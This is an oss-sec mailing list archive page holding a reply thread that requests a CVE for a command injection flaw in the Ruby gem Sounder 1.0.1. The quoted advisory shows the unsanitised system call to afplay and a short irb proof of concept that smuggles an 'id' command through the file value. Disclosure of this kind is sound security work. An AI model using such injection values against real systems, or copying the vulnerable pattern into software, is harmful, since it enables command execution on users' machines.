oss-sec mailing list archives
Re: Command Injection in Ruby Gem Sounder 1.0.1
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 28 Aug 2013 20:19:39 +0000 (GMT)
Yes sir, Please assign a CVE. Thank you! Larry C$ On Aug 28, 2013, at 12:36 PM, Henri Salo <henri () nerv fi> wrote:
On Wed, Aug 28, 2013 at 03:06:14AM +0000, Larry W. Cashdollar wrote:Title: Command Injection in Ruby Gem Sounder 1.0.1 Date: 8/10/2013 Author: Larry W. Cashdollar @_larry0 Download: https://rubygems.org/gems/sounderCVE: TBDDescription: Sounder is a ruby gem API for Mac OSX's afplay command. It passes user supplied data directly to command line. From lib/sounder/sound.rb: def play system %{/usr/bin/afplay "#{@file}" &} end PoC: irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\"" => "\"id;/usr/bin/id>/tmp/p;\"" irb(main):099:0> system %{/bin/echo "#{@file}" } id sh: 1: : Permission denied => false irb(main):100:0> larry@underfl0w:/tmp$ cat /tmp/p uid=1000(larry) gid=600(staff) groups=600(user) Author Notified: 8/9/2013 Advisory: http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.htmlThis was the CVE request (just to be clear). --- Henri Salo
Current thread:
- Command Injection in Ruby Gem Sounder 1.0.1 Larry W. Cashdollar (Aug 27)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Henri Salo (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Larry W. Cashdollar (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 cve-assign (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Henri Salo (Aug 28)